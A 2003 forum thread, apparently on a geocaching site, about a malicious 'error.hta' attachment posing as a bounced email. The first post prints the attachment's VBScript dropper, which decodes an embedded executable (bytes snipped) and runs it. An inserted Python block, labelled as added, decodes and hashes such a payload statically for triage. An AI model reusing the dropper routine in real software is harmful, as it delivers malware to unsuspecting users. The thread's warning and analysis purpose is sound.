+Sissy-n-CR Posted May 23, 2003

Just got what appeared to be a bounced email from a Yahoo! account (I have friends that use Yahoo), but something didn't feel right. As you may know, sometimes the bounced message is returned as an attachment and this one is called "error.hta." Here is the code:

<title>Error</title>
<script language=vbs>
malware="4d,5a,90,0,3,0,0,0,4,0, ...snipped for safety... 0,0,0,0,0,0,0"
tmp = Split(malware, ",")
path = "c:command.exe"
Set fso = CreateObject("Scripting.FileSystemObject")
Set shell = CreateObject("WScript.Shell")
Set f = fso.CreateTextFile(path, ForWriting)
For i = 0 To UBound(tmp)
  l = Len(tmp(i))
  malware = Int("&H" & Left(tmp(i), 2))
  If l > 2 Then
    r = Int("&H" & Mid(tmp(i), 3, l))
    For j = 1 To r
      f.Write Chr(malware)
    Next
  Else
    f.Write Chr(malware)
  End If
Next
f.Close
runscr=1
if runscr then shell.run(path)
</script>

Code snipped for safety. I'm not a programmer, but it appears the section where I snipped is a program that is loaded by the rest of the VisualBasic script and then run. What it does, I have no idea.

BE VERY CAREFUL OPENING WHAT APPEARS TO BE BOUNCED EMAIL!!! It could very well be a virus/worm.

CR
+Searching_ut Posted May 23, 2003

I've been getting a lot of e-mail with a virus attached lately. Fortunately, Norton has been deleting them for me. Probably 8 out of 10 of them are in e-mails claiming to be some sort of Microsoft security update. Judging by the mailing lists, many of them seem to be sent out to mailing lists derived from newsgroups I post to using a valid e-mail address.

I try to keep my anti virus software up to date, but really should be more cautious about backing my data up regularly.
+AmericanSpirit Posted May 23, 2003

Quick search on Google turned up this: http://securityresponse.symantec.com/avcenter/venc/data/downloader.bo.b.dr.html

Seems it downloads a backdoor trojan program. I'm not that familiar with VBS so feel free to correct me if I am wrong, but it seems that script overwrites the command.exe file with whatever was stored in malware.

[This message was edited by AmericanSpirit on May 23, 2003 at 02:58 PM.]
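Added example (not part of the original thread or any poster's code): a static decoder for the encoding used by the script in the first post and described in the reply above, so the embedded file can be sized, hashed and checked for an "MZ" header without ever running the .hta. The sample input is constructed and harmless; the function names and the size limit are assumptions made for this illustration.

```python
import hashlib
import re

# Constructed sample in the same shape as the attachment; the "payload" is a
# harmless 12-byte stand-in, not data from the real file.
SAMPLE_HTA = (
    '<title>Error</title><script language=vbs>'
    'malware="4d,5a,90,0,3,0004,ff02,41"tmp = Split(malware, ",")</script>'
)

MAX_OUTPUT = 16 * 1024 * 1024  # assumed cap: refuse absurd repeat counts


def extract_blob(hta_text, var="malware"):
    """Return the quoted comma-separated hex string assigned to `var`, or None."""
    m = re.search(r'\b%s\s*=\s*"([0-9a-fA-F,\s]*)"' % re.escape(var), hta_text)
    return m.group(1) if m else None


def decode_blob(blob):
    """Mirror the script's loop: the first two hex digits of a token are the
    byte value; any remaining digits are a hex repeat count."""
    out = bytearray()
    for tok in blob.split(","):
        tok = tok.strip()
        if not tok:
            continue
        value = int(tok[:2], 16)
        count = int(tok[2:], 16) if len(tok) > 2 else 1
        if len(out) + count > MAX_OUTPUT:
            raise ValueError("decoded size exceeds limit")
        out.extend(bytes([value]) * count)
    return bytes(out)


def triage(hta_text):
    """Summarise the embedded file for lookup against AV/threat-intel sources."""
    blob = extract_blob(hta_text)
    if blob is None:
        return None
    data = decode_blob(blob)
    return {
        "size": len(data),
        "is_pe": data[:2] == b"MZ",  # Windows executables start with "MZ"
        "sha256": hashlib.sha256(data).hexdigest(),
        "head": data[:8].hex(),
    }
```

The attachment is only read as text here; a hash from `triage()` on a saved copy can then be searched on vendor sites instead of opening the file.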
+Sissy-n-CR Posted May 23, 2003

Just checked out a few security sites and this one is a fairly low risk backdoor trojan that uses IRC for control.

Also, I have my work addresses forwarded to one of my home addresses. I didn't notice that this particular message had actually been targeted to the webmaster of the company site, me. I think it safe to assume the geocaching community is not being targeted, but the address was scraped from the website I manage.

Still, it is always good practice to not open an attachment until you know for certain what it is.

CR
+Sissy-n-CR Posted May 23, 2003

quote: Originally posted by AmericanSpirit:
http://securityresponse.symantec.com/avcenter/venc/data/downloader.bo.b.dr.html

That's the one!

CR
+Metaphor Posted May 23, 2003

Boy, I love my Mac!

"All of us are standing in the mud, but some of us are looking at the stars." Oscar Wilde
Davros Posted May 23, 2003

Be sure you don't have a trojan that siphons your address book then sends you viruses that appear to be from your own friends.. There are many of them that do just that.. The names elude me right now but I'll remember them soon enough..

In the meantime don't open anything attached to Yahoo or Hotmail.. In fact they are banned from my domain.. Any mail from them or any resemblance thereof is sent to the trash the instant it arrives.

Randall J. Berry
davros@mdgps.net
www.mdgps.net
+Byron & Anne Posted May 23, 2003

quote: Originally posted by Metaphor:
Boy, I love my Mac!

When there's a few more Macs out there you'll be getting them too. So smile now.

Byron
+user13371 Posted May 24, 2003

quote: Originally posted by Byron & Anne:
When there's a few more Macs out there you'll be getting them too. So smile now.

Wrong

The Mac OS lacks many of the security holes that make PCs such powerful incubators for viruses. It may not be bullet-proof, but it's better than anything else out there.

--- LDR.
+Sissy-n-CR Posted May 24, 2003

I'm no computer expert, but I don't think it's the platform--it's the OS. Popularity, also, has nothing to do with it. The most virus prone computer I've ever seen is the Amiga. The bootblock hole was probably the most exploited ever if you consider the number of infections versus the installed base.

But for me, anymore, a computer is little more than an appliance. I don't tinker much anymore, so like I said, I'm no expert.

CR
Davros Posted May 24, 2003

I'm sorry, say what you like about Macs.. But you couldn't pay me enough to even use one let alone buy one.. Windowz may have its quirks but it's 100% better for my personal use than Mac will ever be. Besides.. I know how to use *nix too so if need be I can operate a computer 10x better than both Mac or PC..

PS don't give me the OSX crap about it being FreeBSD 'Darwin' as they call it is a sorry ripoff if I've ever seen one!

Randall J. Berry
davros@mdgps.net
www.mdgps.net
+aka Monkey Posted May 24, 2003

Now, now, let's not get the flamewar going. PCs are great for some things, Macs are great for others (in the world of graphic design, Macs are the standard).

"I know how to use *nix too so if need be I can operate a computer 10x better than both Mac or PC.."

OS X *IS* UNIX. With a nifty graphical interface on top, but it's all UNIX underneath. Believe me, I've been in there.

Anyway, back to the topic at hand... as far as I know, there's yet to be a single virus for OS X. Of course, this hasn't stopped Symantec from persuading everyone that they must spend $50 on their antivirus software, lest they suffer a fate worse than death. God I love marketing.
+DavidMac Posted May 24, 2003

My brother started having problems with a similar strain recently; apparently a bunch of his friends had no AV software installed and their computers now send out one copy a day to every person in their address book. Kinda suspicious when you get 12 identical emails a day saying your friend's email address is invalid

...Not all who wander are lost... unless the batteries in their GPS die, their maps get ruined by rainwater when their pack leaks, and they find themselves in a laurel thicket. Then, they are probably lost.

-DavidMac; (formerly Someonenameddave)